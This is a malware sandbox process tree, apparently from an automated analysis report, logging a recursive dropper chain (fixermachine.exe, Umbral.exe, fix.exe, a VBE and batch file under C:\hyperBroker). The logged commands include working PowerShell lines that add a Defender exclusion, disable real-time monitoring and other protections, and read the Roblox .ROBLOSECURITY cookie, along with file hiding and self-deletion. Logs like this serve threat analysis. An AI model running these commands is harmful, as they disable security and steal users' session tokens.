C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"34⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"35⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "36⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"37⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"31⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"32⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"32⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"33⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"34⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "35⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"36⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"30⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"31⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"31⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"32⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"33⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "34⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"35⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"29⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"30⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"30⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"31⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"32⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "33⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"34⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"28⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"29⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"29⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"30⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"31⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "32⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"33⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"27⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"28⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"28⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"29⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"30⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "31⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"32⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"26⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"27⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"27⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"28⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"29⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "30⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"31⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"25⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"26⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"26⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"27⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"28⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "29⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"30⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"24⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"25⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"25⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"26⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"27⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "28⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"29⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"23⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"24⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid25⤵
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"25⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'25⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 225⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY25⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY25⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption25⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory25⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid25⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER25⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name25⤵
- Detects videocard installed
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause25⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"24⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"25⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"26⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "27⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"28⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"22⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"23⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"23⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"24⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"25⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "26⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"27⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"21⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"22⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"22⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"23⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"24⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "25⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"26⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"20⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"21⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"21⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"22⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"23⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "24⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"25⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"19⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"20⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"20⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"21⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"22⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "23⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"24⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"18⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"19⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"19⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"20⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"21⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "22⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"23⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"17⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"18⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"18⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"19⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"20⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "21⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"22⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"16⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"17⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"17⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"18⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"19⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "20⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"21⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"15⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"16⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"16⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"17⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"18⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "19⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"20⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"14⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"15⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"15⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"16⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"17⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "18⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"19⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"13⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"14⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"14⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"15⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"16⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "17⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"18⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"13⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"13⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"14⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"15⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "16⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"17⤵
- Executes dropped EXE
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"11⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"12⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"13⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"14⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "15⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"16⤵
- Executes dropped EXE
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"11⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"11⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"12⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"13⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "14⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"15⤵
- Executes dropped EXE
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"10⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid11⤵
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"11⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 211⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY11⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption11⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory11⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid11⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name11⤵
- Detects videocard installed
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause11⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"11⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"12⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "13⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"14⤵
- Executes dropped EXE
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"9⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"11⤵
-
